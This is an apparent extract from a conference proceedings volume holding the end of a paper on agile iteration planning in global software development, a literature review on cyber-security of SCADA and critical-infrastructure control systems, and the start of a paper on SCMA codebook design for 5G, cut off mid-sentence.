The software development team faces a number of difficulties managing GSD because of its organizational and technological complexity [8]. In particular, challenges that are not present in the development of traditional systems are brought on by temporal, geographic, and sociocultural distances [8]. GSD practitioners face several challenges during different phases of software development, such as low frequency of communication between remote counterparts, delayed feedback, knowledge management difficulties, reduced cohesiveness of the team, insufficient shared understanding among distributed team members, and lack of awareness of progress monitoring [17]. Agile software development methodologies were initially designed for small projects with co-located team members, since co-location allows face-to-face team collaboration and quick software releases [4]. This has advantages including delivering business value more frequently than traditional software development techniques, allowing quicker changes to the program being built, and increasing the rate at which software faults are corrected [4]. Given these strengths, agile was applied to more complex software projects, particularly ones in which teams are dispersed across several locations [4]. Adopting agile for distributed software development has been linked to advantages including follow-the-sun development, which boosts overall project productivity, cost savings from shifting work to countries with cheaper labor costs, and access to a larger talent pool [4].


Our previous work [6] highlighted the first level of Agile planning focusing on the pre-planning phase by describing its application within an Agile Global Software Development projects. Project Planning process is composed of three phases: pre-planning, Release planning, and iteration planning. Through these phases, it highlights project vision, cost, and time of completion. It determines the different resources involved in it. Also, it identifies the dependencies between activities to enable project managers to minimize the idle time and optimize the schedule [10]. This paper focuses on the Iteration Planning level in Agile Global Software Development projects by presenting, based on the existed literature, the best agile practices proposed and recommended to be applied within GSD Iteration Planning. 2.2

Iteration Planning in Software Development Project

Agile projects use an iterative method to achieve incremental delivery; a project can be divided into numerous releases, which helps speed up the time it takes to get a product to market [20]. Every release is made up of numerous iterations, each of which lasts 2–4 weeks [20]. The goal is for customers to be able to instantly see and provide comments on how the system works [20]. Every iteration is made up of numerous user stories, and the user story is the most popular technique for eliciting and expressing needs; a user story is broken down into a set of tasks in order to deliver the function [20]. Iterations or sprints are used to break down the release. Each iteration starts with an Iteration Planning session, during which the team decides on the list of stories that will be implemented during the iteration; this list is referred to as the sprint backlog [21]. During the iteration, the team uses engineering best practices such as Test-Driven Development, Pair Programming, and Continuous Integration. Every day, the team has a short Stand-up Meeting or Scrum Meeting to discuss progress and challenges [21]. The focus of agile project planning is on the next iteration: the project team meets after each iteration to determine the content (scope) of the following iteration (iteration backlog). The idea is that the team learns from its mistakes and improves its estimation skills over time. After a number of iterations have been completed, the team can calculate its team velocity, which is the average time spent implementing one feature, and use it in subsequent planning meetings [10]. Because iterations are brief, there is little room for error, and projections are generally accurate [10].
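As a small illustration of the velocity idea above, the sketch below computes a team's velocity from completed iterations and uses it to project how many more iterations the remaining backlog will need. It is only a hedged example; the story-point figures, and the use of story points rather than time per feature, are assumptions made for illustration.

```python
def team_velocity(completed_points_per_iteration):
    """Average number of story points completed per iteration."""
    return sum(completed_points_per_iteration) / len(completed_points_per_iteration)

def iterations_remaining(backlog_points, velocity):
    """Whole iterations needed to burn down the remaining backlog at the given velocity."""
    full, rest = divmod(backlog_points, velocity)
    return int(full) + (1 if rest > 0 else 0)

# Hypothetical usage: points delivered in the last four iterations and a 120-point backlog.
history = [21, 18, 24, 20]
v = team_velocity(history)
print(f"velocity = {v:.1f} points/iteration")
print(f"estimated iterations remaining = {iterations_remaining(120, v)}")
```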

3 Iteration Planning in GSD: Activities and Repositories

3.1 Iteration Planning in GSD Project: Activities

In this phase, the project manager should be able to continuously monitor and adjust the process according to the circumstances, and be aware of the remote team's cultural peculiarities, working style, and holiday patterns. He or she should be tech-savvy, unbiased, open, and able to resolve conflicts [16].


• Unbiased management. All members should be treated equally by senior managers, sponsors, and management, regardless of their location [15]. To demonstrate impartiality across both locations and cultures, challenging and creative work should be evenly distributed among onshore and qualified offshore team members. This will encourage distant team members to work together, promote team ownership, and eliminate friction [15].
• Conflict resolution. Conflict can arise between the team and the customer, and also between offshore and onshore teams. In the first case, in order to achieve the cost and time benefits of GSD, GSD problems may be neglected and unrealistic milestones set, which may result in low-quality products or undue pressure on team members [19]. As for conflicts between offshore and onshore teams, the project manager should immediately resolve all conflicts, issues, and misunderstandings that crop up between distributed team members during product development. Contracts should provide justice to clients as well as vendors [19].
• Task allocation. The effective allocation of tasks to distributed teams can help accrue the potential benefits of GSD, whereas incorrect allocation can increase the risks associated with GSD and can lead to project failure [19]. The factors that need to be considered during task allocation in GSD include the dependencies between tasks, the stability of requirements, the product architecture, and the size and complexity of the tasks to be distributed. Other factors include technical expertise, temporal differences, geographic distances, resource cost, local government laws, intellectual property ownership, and the reliability and maturity level of vendors. Language proficiency, the experience of team members, the time that distributed members can devote, the allocated travel budget, and the communication, coordination, and knowledge-sharing mechanisms also need to be considered during task allocation [19] (a simple scoring sketch is given after this list).
• Iteration development process. The development team begins developing user stories in accordance with customer desire, and testing activities then follow. During weekly coordination meetings, a groomed backlog is established from the product backlog, and from it developers are given high-priority user stories so that any remaining design and analysis can be completed before implementation [18]. After that, developers using test-driven development (TDD) start writing unit tests for the selected user stories, let the tests fail, then write the code, unit test it, refactor it if necessary, and request a code review from more experienced developers. These reviews can catch any poorly understood functionality early on and keep the quality of the code and design up to date. Also, by giving developers rapid feedback on their code, they help improve knowledge exchange [18].
• Quality assurance and testing. The development team reviews the code, then hands it over to the quality assurance and testing (QAT) team for additional testing. It is then handled by the user acceptance testing (UAT) team before being handed off to the deployment team [18]. If any problems are discovered during QAT or UAT, the responsible developer fixes them and the fixes are returned to the QAT environment. To clear up misunderstandings, lessen rework, and assist maintenance, developers can update the related documentation while the test team is testing the code. Additionally, they begin working with the Team Product Owner (TPO) on the preliminary design and analysis of the following user stories [18].


• Global work visualization. The kanban board is a tool that distributed development teams can use to better visualize the work done at various locations and identify development bottlenecks. For GSD projects, an electronic kanban board can be maintained, with one swim lane per team [18].
• Distributed daily scrum meeting. Project teams with fewer than 15 members can conduct distributed daily scrum meetings. Alternatively, local daily scrum meetings can be held, with the Chief Product Owner (CPO) invited to participate in the sessions held at any site [18]. To reduce the time spent in meetings and eliminate any language barriers, the replies to the daily scrum questions can be mailed. This also gives the other team members time to consider solutions to a developer's problem. If these emails are kept in a knowledge base, they can serve as a record of communications and raise developer awareness of other members' work [18].
• Pair programming. Despite the time gap, the practice of pair programming works satisfactorily. The use of pair programming was thought to provide a number of important benefits: both companies concluded that the code quality was excellent and that this quality had been obtained earlier. One reason for this could be that the developers were not stumped as to what to do next. Even though there was sometimes a delay in response, engineers were eager to be flexible in order to generate as much overlap in time as possible when one partner was in doubt. Furthermore, having pairs was beneficial for testing and debugging, since someone with a fresh perspective could identify issues that the pair partner might miss [7].
• Sprint planning meeting. The meeting is divided into three parts: a distributed meeting during three synchronous working hours, with the product owner explaining the backlog items, followed by consecutive site-specific parts. The distributed part is arranged using teleconferencing and application sharing [14].
• Sprint demo. Arranged as a distributed meeting using teleconferencing and application sharing, in which all team members, the scrum master, and the product owner participate [14]. The sprint demo brings transparency to the project and also prevents problems by providing a frequent monitoring opportunity between the sites [14].
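The task-allocation factors listed above can be combined, for example, into a simple weighted scoring of candidate sites for each task. The sketch below is only an illustrative, hypothetical aid, not a practice drawn from the cited studies; the factor names, weights, and ratings are invented for the example.

```python
# Hypothetical weights reflecting how much each factor matters for this project (they sum to 1).
WEIGHTS = {
    "technical_expertise": 0.30,
    "temporal_overlap": 0.20,
    "task_dependency_fit": 0.20,
    "resource_cost": 0.15,
    "language_proficiency": 0.15,
}

def site_score(ratings):
    """Weighted score of one candidate site; 'ratings' maps factor name -> 0..10 rating."""
    return sum(WEIGHTS[f] * ratings.get(f, 0) for f in WEIGHTS)

def best_site(candidates):
    """Pick the candidate site with the highest weighted score."""
    return max(candidates, key=lambda name: site_score(candidates[name]))

# Invented ratings for two sites evaluated for one backlog task.
candidates = {
    "onshore_team": {"technical_expertise": 7, "temporal_overlap": 9,
                     "task_dependency_fit": 8, "resource_cost": 4, "language_proficiency": 9},
    "offshore_team": {"technical_expertise": 8, "temporal_overlap": 5,
                      "task_dependency_fit": 6, "resource_cost": 9, "language_proficiency": 7},
}
print("allocate task to:", best_site(candidates))
```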

3.2 Iteration Planning Repositories

Iteration planning relies on three repositories: the code repository stores the source code of finished user stories; the test repository stores the user story test cases; and the release repository stores the documentation and the ready-to-deploy source code of user stories [18].

4 Conclusion

Global software development refers to the practice of using geographically distributed software development teams. Reduced labor costs, access to remote experts, and increased productivity around the clock are the main advantages of GSD that drive the adoption of this type of development by most software companies.


However, due to its distributed nature, GSD presents several challenges, which increase the probability of GSD project failure. Throughout the literature, multiple reports have demonstrated the effectiveness of applying agile methods to GSD projects and their ability to mitigate a significant number of these challenges. This paper gives an overview of how agile techniques might benefit dispersed projects by assisting project managers with iteration planning and providing a variety of agile strategies to consider.

References 1. Global Project Management: Communication, Collaboration and Management across Borders (2007) 2. Chadli, S.Y., Idri, A., Fern´ andez-Alem´ an, J.L., Ros, J.N., Toval, A.: Identifying risks of software project management in global software development: an integrative framework. In: 2016 IEEE/ACS 13th International Conference of Computer Systems and Applications (AICCSA) (2016) 3. Belkasmi, M.G., et al.: Global it project management: an agile planning assistance. In: Advances in Smart Technologies Applications and Case Studies (2020) 4. Ghani, I., Lim, A., Hasnain, M., Ghani, I., Babar, M.I.: Challenges in distributed agile software development environment: a systematic literature review. KSII Trans. Internet Inf. Syst. (TIIS) (2019) 5. Haig-Smith: Cloud computing as an enabler of agile global software development. Issues Inf. Sci. Inf. Technol. (2016) 6. Belkasmi, M.G., Saber, H.L., Metthahri, H.: Pre-planning process model in agile global software development. Innov. Smart Cities Appl. 5 (2022) ´ Agile practices 7. ˚ Agerfalk Helena Holmstr¨ om, P.J., Fitzgerald, B., Conch´ uir, E.O.: reduce distance in global software development. Inf. Syst. Manag. (2006) 8. Holmstrom, H., Conchuir, E.O., Agerfalk, P.J., Fitzgerald, B.: Global software development challenges: a case study on temporal, geographical and socio-cultural distance. In: 2006 IEEE International Conference on Global Software Engineering (ICGSE 2006), pp. 3–11 (2006) 9. Hossain: Scrum practices in global software development: a research framework. Product-Focused Softw. Process Improv. (2011) R Congress 10. Sonja, U.N.K.: An agile guide to the planning processes. In: PMI Global 2009 (2009) 11. Richardson, I., Marinho, M., Noll, J., Beecham, S.: Plan-driven approaches are alive and kicking in agile global software development. In: International Symposium on Empirical Software Engineering and Measurement (2019) 12. Moe: Understanding a lack of trust in global software teams: a multiple-case study. Issues Inf. Sci. Inf. Technol. (2008) 13. Niazi, M., et al.: Challenges of project management in global software development: a client-vendor analysis. Inf. Softw. Technol. (2016) 14. Paasivaara, M., Durasiewicz, S., Lassenius, C.: Using scrum in a globally distributed project: a case study. Softw. Process Improv. Pract. (2008) 15. Ralyt´e, J., Lamielle, X., Arni-Bloch, N., L´eonard, M.: A framework for supporting management in distributed information systems development. In: 2008 Second International Conference on Research Challenges in Information Science, pp. 381– 392 (2008)


16. Ramesh, B., Cao, L., Mohan, K., Xu P.: Can distributed software development be agile? Commun. ACM (2006) 17. Suman, U., Jain, R.: Effectiveness of agile practices in global software development. Int. J. Grid Distrib. Comput. (2016) 18. Suman, U., Jain, R.: An adaptive agile process model for global software development. Int. J. Comput. Sci. Eng. (IJCSE) (2017) 19. Suman, U., Jain, R.: A project management framework for global software development. ACM SIGSOFT Softw. Eng. Notes (2018) 20. Tian-en, C., Zhong, S., Liping, C.: Agile planning and development methods. In: 2011 3rd International Conference on Computer Research and Development, pp. 488–491 (2011) 21. Sureshchandra, K., Shrinivasavadhani, J.: Adopting agile in distributed development. In: 2008 IEEE International Conference on Global Software Engineering, pp. 217–221 (2008)

Sensitive Infrastructure Control Systems Cyber-Security: Literature Review

Tizniti Douae(B) and Badir Hassan

Data and Systems Engineering Research Team, Tangier, Morocco
[email protected]

Abstract. In parallel with the development of digital technologies, and integration of computer technologies into the world of process control, today we are witnessing a powerful rise in the vulnerability of information systems due to the multiplication and diversification of illegal activities in cyberspace and computer attacks that have repeatedly disrupted the functioning of the information flow and communication systems of several countries. Since Cyber-attacks are more and more evolving, the potential damage on control systems is amplified, which makes cyber security an essential component of functional security. Currently the automation of industrial infrastructures has become crucial, due to the interests and facilities it provides. And during the development of technology, SCADA systems have undergone a very remarkable change, especially during the third generation that is based on networks, and the fourth that exploits the Internet of Things and cloud computing. As a result, Supervisory control and data acquisition (SCADA) systems have become increasingly vulnerable, and their safety perimeters remain narrower. However, when it comes to remotely managing a sensitive industrial infrastructure, the security of remote management remains an essential condition, especially with the advent of a new era of intelligence that materializes in Smart-cities, Smart -grids, smart-houses, and smart-cars…. The conducted research is part of this framework, and aims to introduce the various elements of sensitive control systems, and to present the literature review of results and studies established based on various legislative and normative references dealing with the subject of the cyber-security of this kind of control systems, taking into consideration all collaborators that may have a direct or indirect impact on it. This article aims to unveil the various avenues of research that open up to the theme of cyber-security in several areas of science. Keywords: Cyber-security · Control systems · SCADA · Remote management · Cyber-war · Cyber-attack · Sensitive infrastructure

1 Introduction

Currently, information and communication technologies (ICT) and information systems (IS) represent the core business of the vast majority of companies, organizations, and institutions.


Through these systems, state entities and administrations, the most strategic companies, and the entire national economic fabric are controlled, which makes them more vulnerable. By critical infrastructure we mean a socio-technical network whose disruption, or the destruction of its physical or cyber components, has an impact on security, safety, and social and economic well-being. These consequences can be caused by natural disasters, extreme weather conditions, industrial accidents, intentional attacks, and human error [1]. Since critical infrastructures are interdependent in a bi-directional way, the failure of one infrastructure can easily impact others; cyberspace gathers four types of interdependencies: physical (hardware), cybernetic, geographic or spatial, and a logical layer that includes software and network protocols. Among critical infrastructures, energy infrastructures are an important target of cyber-attacks; this type of infrastructure has moved, in a short period of time, from isolated and protected industrial systems to an open network of interconnected technologies. This progress in digitalization ensures energy efficiency and consumption control, but it also makes the networks more vulnerable to cyber-attacks. Computer attacks can affect vital services, which is a strong argument for studying the cyber-security (CS) of remote-control systems from the perspective of critical infrastructure (CI) protection, with the research goal of building a trustworthy technical system for remote control.

2 An Overview of Cyber-Security

Cyberspace has become an important and worsening dimension of conflicts, involving security and state interests, through cyberwars conducted totally or partially using cybernetic means. The purpose is to make counterparts unable to use cyberspace systems efficiently. The possibility of acting remotely makes the damage resulting from the alteration of memories and of transmission or command-and-control systems very significant, especially since offensive and defensive means change every day [3]. This is the reason why states have started to develop cyber-strategies, in order to be able to react to cyber-attacks and enhance their resilience in response to these threats.

2.1 Cyber-Security

Cyberspace has become an important dimension of current conflicts, which are getting worse and jeopardize the security of states and of companies managing critical infrastructures [2]. By cyber-security we mean the process of protecting information through prevention, detection, and response to attacks; the purpose of maintaining the cyber-security of an infrastructure is to protect it from cyber-attacks that can disrupt power, electricity, security, and financing systems [1–4]. Cyber risk materializes in the form of material and physical damage caused by a cyber-attack.


2.2 Cyber-Attacks

Among the different types of cyber-attacks, we distinguish:

• Denial-of-service attack: it aims to locate an unsecured Internet access point reachable from the outside and then flood the control station and servers with requests that exceed their processing capacity, until they become inoperative, inaccessible, and unable to control production [2].
• Attack via a wireless network: when facilities are connected by wireless networks, protection and security become insufficient, which allows infiltration into the network from outside and eventually unauthorized access to trade secrets.
• Attack by a malicious employee: in this case the internal origin of the sabotage is a corrupted employee, or one at odds with his employer, holding significant access rights on the network. Such an employee can render part of the computer system inoperative and cause the main functionality of a specific infrastructure to stop.
• Attack by malware: it aims to retrieve confidential information or modify it. These programs install themselves and are able to recover sensitive data without the owner's knowledge.

Cyber-attacks exploit vulnerabilities that are unknown to a system. Their main targets are sensitive data such as financial data and customer files, production IT systems, and remote-control systems for industrial and logistics infrastructures. The internal and external factors of a successful attack are:

Lack of prevention, and awareness among employees. Lack of visibility on the IT environment (network routing) Proprietary and obsolete software and operating systems. Security team not skilled in malware scanning, cyber-diagnosis, incident response and threat monitoring.

Organizations need to reassess the SCADA control systems and risk model to achieve in depth defense solutions for these systems. The strategy to deal with cyber-attacks against the nation’s critical infrastructure requires first understanding the full nature of the threat. A depth defense and proactive solutions to improve the security of SCADA control systems in order to ensure a security and survivability of critical infrastructure [5]. Considering the variety of cyber-attacks, while establishing research on critical infrastructure cyber-security it is important to consider also the social, and political dimension as well as technical dimension.


2.3 Cyber-Defense

Cyber-defense refers to all the activities carried out by the Ministry of Defense in cyberspace to ensure the proper functioning of the armed forces [7]. Each state must build its own cyber-power, and the militarization of cyberspace corresponds to a military culture [13]. The three bodies that need to cooperate in cyberspace in order to strengthen it are as follows:

• Organizations responsible for military and government infrastructure.
• Organizations in charge of critical infrastructure protection.
• Representatives of private economic bodies.

2.4 Impact of Cyber-Attacks

Enterprises can be victims of cyber-attacks: any company large enough to succeed in the market is a potential target, and small businesses are not immune either [8]. Organizations need to reassess SCADA control systems and their risk model to achieve defense-in-depth solutions for these systems. The strategy to deal with cyber-attacks against the nation's critical infrastructure requires first understanding the full nature of the threat; defense-in-depth and proactive solutions to improve the security of SCADA control systems ensure the future of control systems and the survivability of critical infrastructure. The impact and damage caused by a cyber-attack can be symbolic, through damage to image and reputation, or real, such as [7]:

• Destruction of economic wealth and destabilization of organizations.
• Disclosure of sensitive data.
• Material damage to property and persons, and public health risks [9].

In an interconnected world, cybernetic damage can quickly affect neutral parties or allies. Simple software can paralyze critical infrastructure such as water and electricity distribution, and can also impact industrial infrastructure by paralyzing production and causing the supply and production chain to stop.

2.5 Consequences of Cyber-Attacks

As a result of cyber-attacks, companies are faced with several consequences, including:

• The identification of attacks, which requires the detection of several events occurring on the company's infrastructure.
• The generation of many security events to process, analyze, sort, and respond to quickly enough.
• The lack of a complete response process (definition of risk level, initial analysis, investigation, containment, diagnosis).


• Lack of visibility into operations when a stolen ID and legitimate software are used, concealing any system violations.
• Difficulty in identifying the expertise to be developed internally, the security tasks to be outsourced, and those that can be entrusted without fear to automated systems.
• Unreadiness to take on all high-level tasks internally.
• Outsourcing of incident-management processes: malware scanning, cyber-diagnostics, incident response, threat scanning.
• Internal management of: risk level definition, prioritization, rapid recovery.

3 Critical Infrastructures

Critical infrastructures include machines, technology, humans, organizations, and institutions. Such structures require the integration of trust: socially, this term refers to a state of expectation that focuses on competence, accountability, and morals; technically, it is related to dependability, reliability, predictability, failure rate, false alarms, transparency, security, and performance, and these are the main aspects that should characterize a critical infrastructure. The information systems used in critical infrastructures have become more developed and complex, yet the treatment of safety, security, and trust remains weak compared to what the situation requires. CIs are socio-technical networks whose disruption, or the destruction of their physical or cybernetic components, impacts safety, security, and social and economic well-being, and can be caused by [1]:

• Natural disasters
• Extreme weather conditions
• Industrial accidents
• Deliberate attacks
• Human errors

Critical infrastructures are interdependent. This interdependence is bidirectional and each depends on the other, so the failure of a single infrastructure easily affects the others. Hence the need to understand the types of interdependencies in order to characterize CIs. These interdependencies are classified into four categories [1]:

• Physical interdependencies: a link between two physical CIs, for example the power supply of a pumping station.
• Cybernetic or informational interdependencies, such as SCADA communication infrastructures.
• Geographical or spatial interdependencies: two CIs in the same place.
• Logical interdependencies: for example, financial links.


Most critical infrastructures are based on ICTs, which makes them sensitive. Hence the need to address the subject of critical infrastructure protection and to study the cyber-security of their IS, because these attacks can affect vital services [1]. Among the existing critical infrastructures, we can cite:

• Energy infrastructure
• Water treatment and distribution infrastructure
• Industrial infrastructure
• Railway infrastructure
• Oil and gas facilities

4 Research Perspectives

The critical safety of industrial SCADA networks is exposed to the myriad security problems of the Internet, which can cause significant damage to critical infrastructure. An attack against a SCADA network might also adversely affect the environment and endanger public safety, and can cause physical and economic losses to the company. Therefore, the security of SCADA networks has become a prime concern for all governments [2]. The treatment of the safety, security, and trustworthiness of CIs remains weak compared to what the situation requires. Most research remains within a limited interaction perimeter, usually of two agents (systems, user/attacker, or both). With the objective of building powerful and fast defenses against attacks and of repairing those that already exist, research in the field of cyberspace security must also take into consideration, for each country, other measures: interpersonal, organizational, systemic, and technical [1].

4.1 Social Dimension

Studies that focus on security and trust related to information system (IS) security and safety for critical infrastructure (CI) protection are rare [1]. Moreover, they are generally carried out by engineers in the context of "trustworthy computing", and the human and social domain is practically absent. Trust is based on the interaction of two agents: human-system or human-human. The value of the information stored in these systems is very important, and it attracts the attention of both well-intentioned and malicious users (cyber-attackers). Hence the importance of including all the human and social sciences. Research in the social and human sciences, or what is known as social engineering, addressing the theme of trust and security of information systems, should enable us to understand the role of trust in social decisions and behaviors, to create trustworthy socio-technical systems, and to define the means by which this criterion can be measured.


The industrial safety assessment shall take into consideration the following elements:

• Technology.
• The human factor.
• The organizational factor, around a framework model that defines the complexity of industrial security.
• The lack of mutual understanding due to the variety of expectations.
• The characterization of external vulnerabilities and their potential social impacts.

4.2 Political Dimension

Cyber-attacks impact international relations and define geopolitical opportunities [8]. The protection of CIs is a political concern; political strategies are needed to strengthen the security of CI information [1]. The gradual affirmation of the legal dimension of cyberspace will inevitably be influenced by political interests and by the current governance of cyberspace [9]. Politics will have to innovate and establish its objectives, rules, and priorities to fit the current cyber situation, in order to preserve critical infrastructures [3].

4.3 Technical Dimension

Factories are becoming more and more ultra-connected; soon customers will be able to order and monitor the production of their products in real time. If this ultra-connectivity is not protected and secured, such a vision will be difficult to achieve. The evolution towards Industry 4.0 uses new communication protocols, which embed data-protection mechanisms (encryption, integrity verification, authentication, etc.). Remote control of installations and automated robots encourages the development of connected industrial objects, which further exposes data to a risk of loss of control, hence the need to take cyber-security into account from the product design phase. A cyber-attack involves the use of a vulnerability in the protection of a site or IS to seize illegitimate power. In this case, three dimensions are mixed: espionage, perversion of the functioning of a system, and revelation of information. A government must be able to distinguish between individuals who may be prosecuted by a local or an international criminal court.

• Industry secured by design (security by design): Production sites have become targets of cyber-attacks as they are increasingly connected. The remedy in this case is the design-safe industry: ensuring the safety of industrial systems from the design stage (writing the specifications and expressing requirements with the end user) has become essential [9], based on the certification criteria and tests through which products bearing the cyber-secure label pass. Research can be conducted toward developing PLCs and/or communication systems able to ensure cyber-security from the design stage. For this purpose, it is recommended to research the mechanisms of cyber-security, to define the qualification criteria that PLCs must meet to be certified, and to consider the human factor in the design of a secure system.


• Study the vulnerability of critical infrastructures: Critical infrastructures and production systems are often connected to the Internet with negligible protection, which makes them an attractive target for attackers with the necessary resources. Well-established threats aim at the destruction or targeted disruption of essential services, with the possibility that a cyber-espionage attack could take place in a tense geopolitical context [8]. The study of these vulnerabilities consists in identifying, understanding, and analyzing the vulnerabilities and interdependencies of CIs, with the aim of predicting, mitigating, and responding to security threats while taking their impacts into consideration.
• Study the impact of maintenance on the cyber-security of equipment: Even if we initially equip our remote management system with all the existing means known for their cyber-security assurances, there comes a day when the equipment will need maintenance actions, whether corrective or preventive. In this case, the vulnerability of the system increases and a malicious program can easily infiltrate it, especially when the maintenance service is outsourced. For this reason, it seems interesting to conduct a study in this direction and to show the impact that maintenance has on the cyber-security of remote management systems.
• Computer weapons, intrusion detection, and traceability: Cyber-attacks are known for their opacity; it is generally difficult to ensure traceability and to identify the perpetrator and/or the person responsible for an attack or act of cybercrime. Computer attackers use relay servers to cover their tracks, which prevents them from being easily identified [2]. Research on SCADA seems to be mostly dedicated to security issues, and the lack of Intrusion Detection Systems (IDS) for SCADA is one of the challenges addressed. The problem with some approaches is that they assume certain patterns without empirical results to support them, so measurement should be an essential part of SCADA IDS research. An intrusion can be detected by identifying abnormal symptoms of the industrial installation, corresponding to deviations from normal and expected operation, by evaluating the connected industrial objects (PLCs, sensors, transmission systems, etc.), and by mapping the industrial networks to know the number of connected machines. These operations can be performed by third parties known as audit and intrusion-test providers.


• Develop management tools: It is necessary to develop management tools other than the SMSSI (information-security management system), which take into consideration the different layers of a CI (the cyber and physical layers, as well as the organizational and strategic business layers) on a national and international scale, together with human factors in the design of a secure system.
• Simulation of attacks: One of the problems with industrial-system simulation is that, unlike for computer systems, there is no large database of vulnerabilities or security advisories from which to build realistic scenarios of possible attacks, nor to interpret their consequences.
• Use machine learning to ensure cyber-security: Integrate the principle of "machine learning" into the remote management system so that it is able to react autonomously to cyber-attacks (a small illustrative sketch is given after this list).
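As a hedged illustration of this last research direction, the sketch below trains an unsupervised anomaly detector on normal SCADA telemetry and flags deviating samples; a real deployment would need validated data, tuning, and a response policy. The feature names, the contamination rate, and the choice of an Isolation Forest are assumptions made only for the example.

```python
import numpy as np
from sklearn.ensemble import IsolationForest

# Hypothetical telemetry: each row is [flow_rate, pressure, valve_command] from normal operation.
rng = np.random.default_rng(42)
normal = np.column_stack([
    rng.normal(50, 2, 2000),     # flow rate
    rng.normal(5.0, 0.1, 2000),  # pressure
    rng.integers(0, 2, 2000),    # valve command
])

detector = IsolationForest(contamination=0.01, random_state=0)
detector.fit(normal)

# New samples arriving over the remote-management link; the last one is manipulated.
new_samples = np.array([
    [50.5, 5.02, 1],
    [49.1, 4.95, 0],
    [80.0, 2.10, 1],   # abnormal combination, e.g., spoofed sensor values
])
flags = detector.predict(new_samples)   # +1 = normal, -1 = anomaly
for sample, flag in zip(new_samples, flags):
    print(sample, "ANOMALY" if flag == -1 else "ok")
```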

5 Conclusion

This article aimed to introduce different concepts related to cyber-security and cyberspace in order to analyze cyber-attacks and the results of current research, so as to draw in detail the research perspectives in the field of cyber-security of remote-control systems that manage critical infrastructures, by approaching all the possible dimensions and not only the technical one.

References 1. Rajaonah, B.: A view of trust and information system security under the perspective of critical infrastructure protection. Revue des Sciences et Technologies de l’Information - Serie ISI: Ing_enierie des Syst_emes d’Information, Lavoisier, 22(1), 109 (2017) 2. Baud, M.: La cyberguerre n’aura pas lieu, mais il faut s’y préparer, Politique étrangère 2(Eté), pp. 305–316 (2012). https://doi.org/10.3917/pe.122.0305 3. Huyghe, F.-B.: Des armes à la stratégie. Revue Internationale et Stratégique 3(87), 53–64 (2012). https://doi.org/10.3917/ris.087.0053 4. Clérot, F., Mayor, V.: Jeu de Go dans le cyberespace, Revue Internationale et Stratégique 3(87), pp. 111–119 2012/. https://doi.org/10.3917/ris.087.0111 5. Hahn, A., Ashok, A., Sridhar, S., Govindarasu, M., et al.: Cyber-physical security testbeds: architecture, application, and evaluation for smart grid. IEEE Trans. Smart Grid 4(2), 847–855 (2013). https://doi.org/10.1109/TSG.2012.2226919 6. Igure, V.M., Laughter, S.A., Williams, R.D., et al.: Security issues in SCADA networks. Comput. Secur. 25(7), 498–506 (2006). https://doi.org/10.1016/j.cose.2006.03.001 7. Kempf, O.: Cyberstratégie à la française. Revue Internationale et Stratégique 3(87), 121–129 (2012). https://doi.org/10.3917/ris.087.0121


8. Kaspersky repports 2017. [1] K. E. Cybersecurity, “Rapport sur les menaces en Afrique du Nord en 2017,” 2017. [2] M. Garnaeva, F. Sinitsyn, and Y. Namestnikov, “STATISTIQUES GLOBALES DE L ‘ ANNEE 2016,” 2016. [3] GReAT, “Fileless attacks against enterprise networks,” SecureList, p. 1, 2017. [4] S. Kaspersky and A. Targeted, “Protection contre les menaces avancées et atténuation des risques d’attaques ciblées Solution Kaspersky Anti Targeted Attack.” [5] “1- Kaspersky-Security-Bulletin-2016_Predictions-2017.” 9. Auditeurs, T.D.E.S.: De La Connexion Internet (2014)

Design of SCMA Codebook Based on QAM Segmentation Constellation

Afilal Meriem1(B), Hatim Anas1, Latif Adnane1, and Arioua Mounir2

1 TIM Team, ENSA, Cadi Ayyad University, Marrakech, Morocco
[email protected]
2 ENSA, Abedelmalek Essaidi University, Tetouan, Morocco

Abstract. Non-orthogonal multiple access (NOMA) has been envisioned as a promising multiple access (MA) technique for fifth-generation (5G) mobile systems. Spectral efficiency can be significantly improved to further support the emerging technologies enabled by fifth-generation wireless networks. The idea behind NOMA is to serve multiple users simultaneously via different power levels and/or codebooks. Based on the non-orthogonal spreading technique, Sparse Code Multiple Access (SCMA) was proposed, using multi-dimensional constellation codebooks. Herein, an optimized design of the SCMA codebook is presented in detail. We highlight the design of each element (mapping matrix F, mother constellation (MC), sub-constellation generation, mapping process) needed to generate these codebooks. The optimization of the codebooks consists in maximizing the minimum Euclidean distance (MED) between adjacent points within the same dimension of the codebook (AP-MED), as well as the MED of superimposed codewords sharing the same resource elements (CW-MED). The design of the mapping matrix F with the Progressive Edge Growth (PEG) algorithm is also presented. The proposed SCMA codebooks are designed and displayed in the paper. Finally, the comparison shows that the proposed codebooks achieve acceptable results in terms of MED maximization, while other aspects remain to be investigated.

1 Introduction
Future 5G wireless technologies such as the Internet of Things (IoT) and Multiple-Input Multiple-Output (MIMO) are expected to support very diverse traffic with much tighter requirements, while fourth-generation (4G) communications based on orthogonal multiple access (OMA) have had difficulty keeping pace with the rapid development of these new communication technologies. SCMA was proposed as one of the NOMA technologies envisioned as a key component of 5G mobile systems [1]. The SCMA system performance is determined by the codebook design, in which the codebook is a complex multi-dimensional constellation. The design process is a multistage approach, in which the optimization of the complex multi-dimensional constellation is the main problem of SCMA codebook design. Under the multistage approach, each step can be optimized considering various key performance indicators, such as:


Minimizing the SER (Symbol Error Ratio): in [2] the codebook design was reduced to the design of a finite number of complex numbers representing the constellation points, and the SER minimization over these variables is accomplished with the help of Differential Evolution (DE). Maximizing the MED: in [3] the design of an MC is based on a 16-star QAM, and the codebook is then generated with a maximum MED between adjacent points within the same dimension of the codebook. On the other hand, in [4] the idea of MED maximization is studied with a newer definition of the MED, namely the MED of superimposed codewords (CW-MED): instead of optimizing the Euclidean distance between adjacent points (AP-MED) within the same dimension of each codebook, the study considers the users' codewords overlapping on the same subcarrier to establish a larger MED, and the max-min optimization is solved by Semidefinite Relaxation (SDR). Moreover, recent studies such as [5] and [6] combine the maximization of both MEDs, AP-MED along with CW-MED. MED maximization helps improve the system's error-rate performance by reducing the collisions of the information bits on the resources. Thus, our main goal is to apply the approach of MED maximization in its two aspects, AP-MED and CW-MED, to design our SCMA schemes. The contributions of this study are as follows. We highlight the design of the mapping matrix, which is usually provided as a default design fed to the SCMA system; we therefore use a PEG algorithm to generate the mapping matrix with a relatively large girth. We then construct an MC with a large MED and, after that, generate codebooks with a large MED between the interfering users. The rest of this paper is organized as follows. Section 2 introduces the SCMA system model. In Sect. 3, the mapping matrix generation based on a PEG algorithm is presented. Section 4 shows how to form the MC and details the procedures to generate sub-constellations from the MC and assign them to the users while increasing the MED. In Sect. 5, a design example is presented where the optimized SCMA codebook is produced. In Sect. 6, a 